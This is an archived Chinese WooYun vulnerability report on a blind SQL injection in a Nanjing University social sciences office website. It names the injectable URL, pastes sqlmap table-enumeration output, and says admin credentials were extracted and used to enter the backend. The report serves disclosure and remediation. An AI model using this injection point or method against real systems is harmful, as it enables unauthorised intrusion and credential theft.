乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-22: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
南京大学社会科学处SQL盲注一枚。。。泄露大部分信息。
注入点
http://skch.nju.edu.cn/showliterary.php?id=65
跑一下,数据库出来了。。。。
真没想到管理员是'sa'权限,想着拿这台服务器也不难吧。看。。
然后继续。。跑出好多表
[18:36:42] [INFO] fetching tables for database: msdb[18:36:42] [INFO] the SQL query used returns 92 entriesDatabase: msdb[92 tables]+-------------------------------------+| MSdatatype_mappings || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_map || backupfilegroup || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primaries || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary_databases || log_shipping_secondary_databases || logmarkhistory || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || sysdatatypemappings || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtslog90 || sysdtspackagefolders90 || sysdtspackagelog || sysdtspackages90 || sysdtspackages90 || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobstepslogs || sysjobstepslogs || sysmail_account || sysmail_allitems || sysmail_attachments_transfer || sysmail_attachments_transfer || sysmail_configuration || sysmail_event_log || sysmail_faileditems || sysmail_log || sysmail_mailattachments || sysmail_mailitems || sysmail_principalprofile || sysmail_profileaccount || sysmail_profileaccount || sysmail_query_transfer || sysmail_send_retries || sysmail_sentitems || sysmail_server || sysmail_servertype || sysmail_unsentitems || sysmaintplan_logdetail || sysmaintplan_logdetail || sysmaintplan_plans || sysmaintplan_subplans || sysnotifications || sysoperators || sysoriginatingservers_view || sysoriginatingservers_view || sysproxies || sysproxylogin || sysproxyloginsubsystem_view || sysproxysubsystem || sysschedules_localserver_view || sysschedules_localserver_view || syssessions || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids |+-------------------------------------+
| DM_PROJECT_COOPERATE || DM_PROJECT_FORM || DM_PROJECT_LEVEL || DM_PROJECT_SOURCE || DM_PROJECT_STATE || DM_PROJECT_STAT_SOURCE || DM_PRO_CHECKUP || DM_PRO_FINISH_FORMAL || DM_PUBLISH_ADDRESS || DM_PUBLISH_LEVLE || DM_PUBLISH_RANGE || DM_QUERY_LOGIC || DM_REPORT_TYPE || DM_RESEARCH_TYPE || DM_RESEARCH_UNIT_KIND || DM_RESEARCH_UNIT_LEVEL || DM_RESEARCH_UNIT_TYPE || DM_RESHIP_NAME || DM_RESHIP_TYPE || DM_RIGHT || DM_ROLE_LEVEL || DM_ROLE_LEVEL || DM_SCHOOL_SIGN || DM_SCHOOL_SIGN || DM_SCHOOL_SUBJECT || DM_SEARCH_TYPE || DM_SECRET_LEVEL || DM_SECRET_TIER || DM_SEX || DM_SHJJMB || DM_STA_TYPE || DM_SUBJECT || DM_SUB_CONTRACT_TYPE || DM_TEACHER_TYPE || DM_TICHENG_PROPORTION || DM_TITLE_DEFINE || DM_TITLE_LEVEL || DM_TITLE_TYPE || DM_TRANSPRODUCT_TYPE || DM_TUTOR || DM_UNITBOOK_TYPE || DM_UNITHONOR_TYPE || DM_UNITJDPRODUCT_TYPE || DM_UNITPAPER_TYPE || DM_UNITPERSON_TYPE || DM_UNITPROJECT_TYPE || DM_UNIT_LEVEL || DM_UNIT_ORDER || DM_UNIT_TYPE || DM_UNIT_ZCLX || DM_WEB_COUNT || DM_YEAR || KH_ASSESS_RESULT_STATE || KH_ASSESS_STATE || KH_ASSESS_TIME || KH_ATTRIB_VALUE || KH_ATTRIB_VALUE || KH_CUSTOMIZE_DISTRIBUTE_MODE || KH_DISPLAY_ATTRIB || KH_OBJECT_ATTRIB_MODE || KH_OBJECT_ATTRIB_MODE || KH_OBJECT_WEIGHT_MODE || KH_PERSON || KH_POSITION_ASSESS || KH_RESULT_COMPUTE || KH_RESULT_DETAIL || KH_SCHEME || KH_TARGET || KH_UNIT || KH_WEIGHT_VALUE || KH_WEIGHT_VALUE || KJ_BASE10 || KJ_BASE2 || KJ_BASE5 || KJ_BOOK_TYPE || KJ_EDU_LEVEL || KJ_HONOR_LEVEL || KJ_HONOR_TYPE || KJ_HONOR_UNIT_ORDER || KJ_INDUSTRY || KJ_PROJECT_HZXS || KJ_PROJECT_SOURCE || KJ_PROJECT_ZZXS || KJ_PUBLISH_AREA || KJ_QKLX || KJ_QKZQ || KJ_QK_LANGUAGE || KJ_RESEARCH_TYPE || KJ_SEX || KJ_ST7_CATEGORY || KJ_SUBJECT_CLASS || KJ_SUBJECT_CLASS || KJ_TITLE_LEVEL || KJ_TITLE_TYPE || KJ_UNIT_CLASS || KJ_UNIT_FORM || KJ_UNIT_TYPE || PERSON || PRODUCT_AUTHOR_VIEW || PRODUCT_AUTHOR_VIEW || PRODUCT_VIEW || RESEARCH_UNIT_BOOK || RESEARCH_UNIT_HONOR || RESEARCH_UNIT_JDPRODUCT || RESEARCH_UNIT_PAPER || RESEARCH_UNIT_PERSON || RESEARCH_UNIT_PRODUCT || RESEARCH_UNIT_PROJECT || SK_ACHIEVEMENT || SK_ACTIVE_TYPE || SK_ACTIVE_TYPE || SK_AUTHORIZE_DEP || SK_BASE8 || SK_DOWNLOAD || SK_EDU_DEGREE || SK_EDU_LEVEL || SK_FILE_MANAGE_TYPE || SK_FILE_MANAGE_TYPE || SK_HONOR_GRADE || SK_HONOR_LEVEL || SK_LINKING || SK_LITERARY || SK_LOCATION || SK_MEETING_TYPE || SK_NOTICE_TYPE || SK_NOTICE_TYPE || SK_PERSON_TYPE || SK_PERSON_TYPE || SK_PICNEWS || SK_PRIZE || SK_PRODUCT_MODE || SK_PROJECT_SOURCE || SK_PROJECT_STATUS || SK_PUBLISH_CIRCLE || SK_PUBLISH_RANGE || SK_RESEARCH_TYPE1 || SK_RESEARCH_TYPE1 || SK_RESEARCH_TYPE1 || SK_RESEARCH_UNIT_TYPE || SK_SEX || SK_STUDY_MANAGER || SK_SUBJECT || SK_TITLE || SK_UNIT_FORM || STATISTIC_STATE || STATISTIC_STATE || STA_ACTIVITY_2008 || STA_ACTIVITY_2008 || STA_FEE_2008 || STA_FEE_2008 || STA_PERSON1_2008 || STA_PERSON1_2008 || STA_PERSON1_2008 || STA_PERSON2_2008 || STA_PERSON2_2008 || STA_PRODUCT2_2008 || STA_PRODUCT2_2008 || STA_PRODUCTHONOR_2008 || STA_PRODUCTHONOR_2008 || STA_PRODUCT_2008 || STA_PRODUCT_2008 || STA_PROJECT1_2008 || STA_PROJECT1_2008 || STA_PROJECT2_2008 || STA_PROJECT2_2008 || STA_RESEARCH_2008 || STA_RESEARCH_2008 || STA_UNIT || S_ACT || S_ARTICLE || S_ART_PRODUCT || S_ASSESS_TIME || S_ATTACHMENT || S_ArtProduct_Author || S_BOOK_AUTHOR || S_BOOK_AUTHOR || S_BREED_AUTHOR || S_BREED_AUTHOR || S_COLUMN || S_CONDITION || S_DOCUMENT_ACCEPT || S_DOCUMENT_ACCEPT || S_DOCUMENT_RESPONSE || S_DOWNLOAD || S_EDITION_SUBMODULE || S_EMAIL_INFO || S_EMAIL_INFO || S_EXPRESS_ADVANCED || S_EXPRESS_DEFAULT || S_EXPRESS_SIMPLE || S_HELP || S_HONOR_AUTHOR || S_HONOR_AUTHOR || S_INCOME_PEITAO || S_JDPRODUCT_AUTHOR || S_JDPRODUCT_AUTHOR || S_JOIN_MEETING || S_KJ_STAT || S_KY_PLAN || S_LECTURE || S_MAGAZINE || S_MAIN_MANAGE_UNIT || S_MANAGE_UNIT || S_MEDICINE_AUTHOR || S_MEDICINE_AUTHOR || S_MEETING || S_MIDDEL_CHECK_PROJECT || S_MODULE_TERM || S_NOTIRY || S_PAPER_AUTHOR || S_PAPER_AUTHOR || S_PAPER_EMBODY || S_PAPER_RESHIP || S_PATENT_AUTHOR || S_PATENT_AUTHOR || S_PATENT_PAY || S_PERSON_MANAGER || S_PERSON_MANAGER || S_PRODUCTTRANS_AUTHOR || S_PRODUCT_TRANSFORM || S_PROJECT_APPLY_BOOK || S_PROJECT_APPLY_BOOK || S_PROJECT_APPLY_INFO || S_PROJECT_COMPLETION || S_PROJECT_CONTRACT_FEE || S_PROJECT_DRAWBACK || S_PROJECT_FEE_BALANCE || S_PROJECT_INCOME || S_PROJECT_INVOICE || S_PROJECT_MEMBER || S_PROJECT_MIDDLE_CHECK_BOOK || S_PROJECT_MIDDLE_CHECK_INFO || S_PROJECT_PAYOUT || S_PROJECT_PLAN || S_PROJECT_YEAR_FEE || S_PRO_MEMBER_INCOME || S_RESEARCH_REPORT_AUTHOR || S_RESEARCH_REPORT_AUTHOR || S_RESEARCH_UNIT_BOOK || S_RESEARCH_UNIT_BOOK || S_RESEARCH_UNIT_HONOR || S_RESEARCH_UNIT_JDPRODUCT || S_RESEARCH_UNIT_JOIN_PRODUCT || S_RESEARCH_UNIT_PAPER || S_RESEARCH_UNIT_PERSON || S_RESEARCH_UNIT_PROJECT || S_RIGHT_ROLE || S_ROLE_SUBMODULE || S_SCHOOL_FEE || S_SCHOOL_FEE || S_SHORT_MESSAGE || S_SOURCESHARE || S_STAT_MAGAZINE || S_STA_CONVERT_ITEM || S_STUDY_MANAGER || S_SUBPROJECT || S_UNIT || actions || admin || batch || blocked_ips || book_author || cache_bootstrap || cache_bootstrap || cache_form || cache_menu || cache_page || cache_path || date_format_type || dtproperties || meeting || paper_author || paper_author || product_achieve || product_achieve || project_outlay || project_outlay || project_work || rd_check_data1 || rd_common_state || rd_common_state || rd_patent_info || research_sta || role || school_fee || statistic_submodule || unit_person || unit_person || unit_product || unit_project || variable |+------------------------------+[18:03:17] [INFO] fetched data logged th.nju.edu.cn'[*] shutting down at 18:03:17
最后,得到用户名和密码
成功进入后台:
发现许多东西。。
可以找到学校的办公系统网站。。还是算了吧,我就到这了,做个好公民!
严格控制关键字,加强前后台防范!
危害等级:高
漏洞Rank:12
确认时间:2015-05-26 15:04
已提交相关业务部门处理
暂无
![KSE%J]_LDK{ANV1B1@%5]CO.jpg](http://wimg.zone.ci/upload/201505/211829500e3da303afa638727ec60c1d790518f2.jpg)
![48ENH1JCKP2SJG$T2DEY]ZY.png](http://wimg.zone.ci/upload/201505/21184123b99acb16a81e55a3d3ffa5888adbcb38.png)
![KR2DRKK6`]TF5K3R$}V4I22.png](http://wimg.zone.ci/upload/201505/21184317f43ee577164361f8ce42c83dd0dad775.png)
![SI`E8]Y2@U4PWUW$QT7YO}P.png](http://wimg.zone.ci/upload/201505/211846178ab018301da5da6173770d5606944a5a.png)
